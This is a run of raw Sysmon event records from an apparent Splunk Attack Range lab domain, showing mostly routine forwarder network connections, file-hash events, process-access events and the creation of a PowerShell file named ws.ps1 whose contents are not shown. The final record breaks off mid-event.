354300x8000000000000000809697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:07.241{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57416-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001053246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:09.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A121027104889DC23D68E8F17C48286,SHA256=92452D7623233CDBFB8AB69C3BF342962353860EB06E31880F6048AC0F8C6120,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:09.779{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35DF33F3C261CAF74A8470BEFF12F373,SHA256=69FC955CF68F6ABF2D9DA9363380B1947213CA330037051E18ACABB2801FD5AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:10.886{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF5D47086CAEC744710532BAA3901A77,SHA256=4D78FA193D44B409912DD4EBBACDD3488993BDE06B292DD393CD9E2C5B1763D0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:10.795{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA4FCC5CFC1ED74B3E54A406AF517558,SHA256=91C001788514992C3642D7A7FF89BA86C0CE1B8200BD46328EA03A19C683A9DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:11.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4B8B58CB7CCB75D654155E8D85BC7C3,SHA256=0C8E9F3664A87A057E18F3EF1AD2BD680531A4C88AA37636A92D950B4E72D4AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:11.826{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81C14E36A48F2956CDC5F7B9A230D4AC,SHA256=5BCFA75C058CB4E5CC63FB9AB24556C10A8AECBDD8B25DEB5EE984E700FA7421,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:03.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61915-false10.0.1.12-8000- 
10341000x80000000000000001053248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:11.401{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001053259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:12.901{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71ED55A3A31D86228848C6FCBFADEBAB,SHA256=44E63A6FEECDAF2BB939A456DAEC734A992E62DD9C36184C24DAB957302D5C1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:12.857{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21F1FAF68CDE20483ED0C45B3126B064,SHA256=95C0DC3E50F9692DD2965672410164A8ED4F7214600B9B66C55B56A1D4690492,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.937{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61918-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001053257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.937{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61918-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001053256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.827{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61917-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.827{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61917-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.820{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61916-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 
354300x80000000000000001053253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:04.820{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local61916-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001053252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:12.286{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=179C2095091145845B75D5BD7F4252E3,SHA256=32513E03A81FC6CB1B6D1A918D7448088282AA360C85D916D621387F99C9A22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:12.286{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=76135BC837B2258BB647AD678349D4ED,SHA256=BB514DB228140CEFB4BAD22486C20FA5885F6828F5B235873E9A03933802ECDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:13.937{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFB819628A696C01BDC5C158EC38B0C8,SHA256=CFC8E5E3F9FB634755821740626B9DA0D93CA12ADD3358C77521D3BA149B9EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:04:13.904{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BCDD861B4EE26CF3383D1092520A33D,SHA256=207F1D830F400A52C2555477724D8DB3A692AA141A77ED6191A7E57DE9ED9A6A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:13.539{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:13.539{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000809703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:12.396{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57417-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:14.932{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811C3F4900EB5B29F8F2ACAD66B7D825,SHA256=86F2C5431858ACF360F1CFA28D8A3D88EB61AA44A6BD36D2497263D9790E2A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:14.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E74579B353FC52A34737D197B8CD886D,SHA256=76B6744AD9E9A53112DC96AC4D0297F0201210151E74B3E7A2776C46F37038EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:15.979{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF91D57F5FB00BCE95A029BF088E5DE3,SHA256=AE8359C7596B912BF84D036F8318121CCDD276177DF7018837440325C9B4C98A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:15.953{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F889B1892A0ADAE0B35CC3109556B430,SHA256=597CB6352C0EE890955AB3599DF97A939BFCE72F5E51ED6ACD639E05CCB3C4AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:08.046{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61919-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001053265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:08.046{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61919-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 
23542300x80000000000000001053264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:15.538{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=179C2095091145845B75D5BD7F4252E3,SHA256=32513E03A81FC6CB1B6D1A918D7448088282AA360C85D916D621387F99C9A22B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:16.995{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CE2F043B4B5F5379CE14F82C2E4B4EB,SHA256=2A40B8C7BAE89A209744B357BC30BFB3EB3AB10BB1F3300C11C2B023299CE199,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:16.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFBBFB13A64127894E7E42D4EE235127,SHA256=E973E3CA414A33BFA128300647642DDBCFFE704BE07B871F5DAEC0C58E42B9F5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:04:16.853{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95720DDBCECD691E2CD3B7DEDE3ABD31,SHA256=88BB7205E6AB7B0D17ABFFA4CF10DD1E49FF5546CF45E9B5634BA098CF525549,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:09.615{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61920-false10.0.1.12-8000- 23542300x80000000000000001053273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.899{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\ws.ps1@2021-07-12_080356MD5=29E7CB8C5040C40311897E6E29ED567E,SHA256=CBE94295A9FC8D9A0C4D23126B453A4A61E0833C6A52F825F7A43F3C06A9E6E4,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.899{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program 
Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps12021-07-12 07:45:42.455 23542300x80000000000000001053271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.899{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.ps1MD5=C65173024A496AE0415444B28AF65966,SHA256=E2A528D2077E841A4645DAB903B915257AD9F568F102B5913F546698EDAB5B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:17.753{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\ws.ps1@2021-07-12_080356MD5=C65173024A496AE0415444B28AF65966,SHA256=E2A528D2077E841A4645DAB903B915257AD9F568F102B5913F546698EDAB5B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:18.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB89236279270C18621DDE91884977C,SHA256=47BA7B3481750AD623C0B5DDD3BC75BF45016A30922947897C696C2294A130B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:18.484{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:18.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A621270CF276F45196B1AE7C9CDCEADF,SHA256=D016FD6D78E6E65771A2A50C47E8ED6B817F9B14E0254680B7B887082EAD6B74,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:18.346{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57418-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:19.057{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6E2918D3830264A4326EEB6075110BB,SHA256=D4E9A3663A0EEEA678F554422704D3A54098CEB8DC2D5DD585137B778C7D465A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809712Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:20.776{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809711Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:20.088{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25EE83079D7FE9A36B008D20F6C4CFD9,SHA256=0EBFB24FFF3204A39C04F701BF0500C3B6E11CEA3A94FB64C2989313B9A98030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:19.999{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6C707506BBF4EB254A8F2219D55873E,SHA256=8806D1D52E64C81D686056ACCF42FF5FF3D2ED4B235E1932ACFAE9DFC9D58252,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809713Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:21.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E51685DD76B8C66CE4E616AEC5599DD,SHA256=04CEA5D81E2756C3806C359A1EA57C22ED6EFB8617108D3611EE5CAD50DE22C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:21.017{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A09EC868D9C1D8B3BF3F06106F9B9951,SHA256=462C4DCC7A76A21A59EB808C93FE7443177B1C357D737AA84578E2FFE2231875,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809715Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:20.909{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57419-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000809714Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:22.135{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=542CB84C3E1729FC4B532FFF4BD57733,SHA256=BDFEA63BBF7B4700C1ECC24138525C00887EA4B3C5E7897B4C27B92570871590,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001053295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:22.974{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001053294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 